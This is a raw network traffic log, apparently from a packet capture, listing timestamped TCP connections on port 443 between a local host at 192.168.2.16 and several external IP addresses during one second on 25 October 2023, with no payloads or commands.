                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.883488894 CEST44349853104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.883575916 CEST44349853104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.883626938 CEST49853443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.883738041 CEST49853443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.883738041 CEST49853443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.883752108 CEST44349853104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.883912086 CEST49853443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.886234999 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.886248112 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.886318922 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.886508942 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.886528015 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.939496040 CEST44349862104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.939877987 CEST49862443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.939896107 CEST44349862104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.940386057 CEST44349862104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.940819025 CEST49862443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.940905094 CEST44349862104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.940985918 CEST49862443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.941003084 CEST44349862104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.963325977 CEST44349863104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.963665009 CEST49863443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.963682890 CEST44349863104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.964057922 CEST44349863104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.964407921 CEST49863443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.964477062 CEST44349863104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.964550018 CEST49863443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.006458998 CEST44349863104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.017587900 CEST44349859152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.018313885 CEST49859443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.018343925 CEST44349859152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.019859076 CEST44349859152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.020324945 CEST49859443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.020700932 CEST49859443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.020700932 CEST49859443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.020801067 CEST44349859152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.030575037 CEST44349861152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.030884027 CEST49861443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.030896902 CEST44349861152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.031961918 CEST44349861152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.032191038 CEST49861443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.032373905 CEST49861443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.032440901 CEST44349861152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.032474995 CEST49861443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.060043097 CEST44349860152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.060467005 CEST49860443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.060483932 CEST44349860152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.061475039 CEST44349860152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.061558008 CEST49860443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.061877966 CEST49860443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.061934948 CEST44349860152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.062011957 CEST49860443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.062017918 CEST44349860152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.064361095 CEST4434985813.107.226.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.064574003 CEST49858443192.168.2.1613.107.226.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.064598083 CEST4434985813.107.226.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.065838099 CEST4434985713.107.253.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.065893888 CEST4434985813.107.226.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.065959930 CEST49858443192.168.2.1613.107.226.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.066240072 CEST49857443192.168.2.1613.107.253.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.066257000 CEST4434985713.107.253.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.066570997 CEST49858443192.168.2.1613.107.226.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.066646099 CEST4434985813.107.226.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.066731930 CEST49858443192.168.2.1613.107.226.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.066739082 CEST4434985813.107.226.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.067428112 CEST4434985713.107.253.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.067492962 CEST49857443192.168.2.1613.107.253.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.067873001 CEST49857443192.168.2.1613.107.253.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.067959070 CEST4434985713.107.253.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.068031073 CEST49857443192.168.2.1613.107.253.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.068042040 CEST4434985713.107.253.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.072225094 CEST44349845104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.072360992 CEST44349845104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.072472095 CEST49845443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.073618889 CEST49845443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.073642969 CEST44349845104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.073712111 CEST49861443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.073718071 CEST49859443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.073723078 CEST44349861152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.073741913 CEST44349859152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.085711956 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.086082935 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.086107969 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.086462021 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.086769104 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.086836100 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.086901903 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.105686903 CEST49860443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.121702909 CEST49857443192.168.2.1613.107.253.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.121706963 CEST49858443192.168.2.1613.107.226.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.121793032 CEST49859443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.121793032 CEST49861443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.130451918 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.136876106 CEST4434986469.152.183.140192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.137201071 CEST49864443192.168.2.1669.152.183.140
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.137223005 CEST4434986469.152.183.140192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.138314009 CEST4434986469.152.183.140192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.138379097 CEST49864443192.168.2.1669.152.183.140
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.138778925 CEST49864443192.168.2.1669.152.183.140
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.138860941 CEST4434986469.152.183.140192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.138955116 CEST49864443192.168.2.1669.152.183.140
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.138964891 CEST4434986469.152.183.140192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.164836884 CEST4434985713.107.253.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.164956093 CEST4434985713.107.253.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.165040970 CEST49857443192.168.2.1613.107.253.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.165843964 CEST4434985813.107.226.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.165930033 CEST4434985813.107.226.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.165993929 CEST49858443192.168.2.1613.107.226.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.166008949 CEST49857443192.168.2.1613.107.253.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.166022062 CEST4434985713.107.253.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.186058044 CEST49864443192.168.2.1669.152.183.140
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.207918882 CEST44349859152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.208058119 CEST44349859152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.208286047 CEST49859443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213042974 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213087082 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213140965 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213152885 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213176966 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213181019 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213210106 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213228941 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213248968 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213249922 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213263988 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213314056 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213325024 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213610888 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213659048 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213673115 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213737965 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213865042 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213874102 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213918924 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213959932 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.213970900 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.214478970 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.214539051 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.214553118 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.214638948 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.214730024 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.214740038 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.214859962 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.214905024 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.214915991 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.216156960 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.216187000 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.216248989 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.216274977 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.216331005 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.218313932 CEST44349856104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.218425035 CEST44349856104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.218496084 CEST49856443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.219058990 CEST49858443192.168.2.1613.107.226.40
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.219085932 CEST4434985813.107.226.40192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.219547987 CEST44349861152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.219602108 CEST44349861152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.219655037 CEST49861443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.219669104 CEST44349861152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.219681978 CEST44349861152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.219712973 CEST49861443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.219753981 CEST49861443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.226161003 CEST49859443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.226176977 CEST44349859152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.227880955 CEST49856443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.227909088 CEST44349856104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.230462074 CEST49861443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.230484009 CEST44349861152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.231709957 CEST49855443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.231745958 CEST44349855104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.241897106 CEST49866443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.241945028 CEST44349866104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.242109060 CEST49866443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.242463112 CEST49866443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.242480993 CEST44349866104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.250154018 CEST44349860152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.250427008 CEST44349860152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.250447035 CEST44349860152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.250509024 CEST49860443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.250514030 CEST44349860152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.250566959 CEST49860443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.265341043 CEST49860443192.168.2.16152.199.4.44
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.265363932 CEST44349860152.199.4.44192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.429645061 CEST4434986469.152.183.140192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.429677010 CEST4434986469.152.183.140192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.429764032 CEST49864443192.168.2.1669.152.183.140
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.429786921 CEST4434986469.152.183.140192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.429835081 CEST4434986469.152.183.140192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.429881096 CEST49864443192.168.2.1669.152.183.140
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.439868927 CEST44349866104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.476588964 CEST44349837104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.476723909 CEST44349837104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.476785898 CEST49837443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.487766027 CEST49866443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.588670969 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.588776112 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.588826895 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.588845015 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.588857889 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.588895082 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.588911057 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.588983059 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589016914 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589026928 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589035034 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589071989 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589081049 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589111090 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589152098 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589158058 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589490891 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589544058 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589550018 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589664936 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589694977 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589713097 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589721918 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.589770079 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.590289116 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.590396881 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.590445042 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.590451956 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.590518951 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.590564966 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.590572119 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.591214895 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.591243029 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.591275930 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.591283083 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.591332912 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.591337919 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.591455936 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.591499090 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.591506004 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.592061996 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.592106104 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.592113972 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.592216015 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.592262030 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.592262983 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.592272997 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.592308998 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.592315912 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.592997074 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.593048096 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.593051910 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.593060017 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.593122959 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.593133926 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.593210936 CEST44349865104.21.0.95192.168.2.16
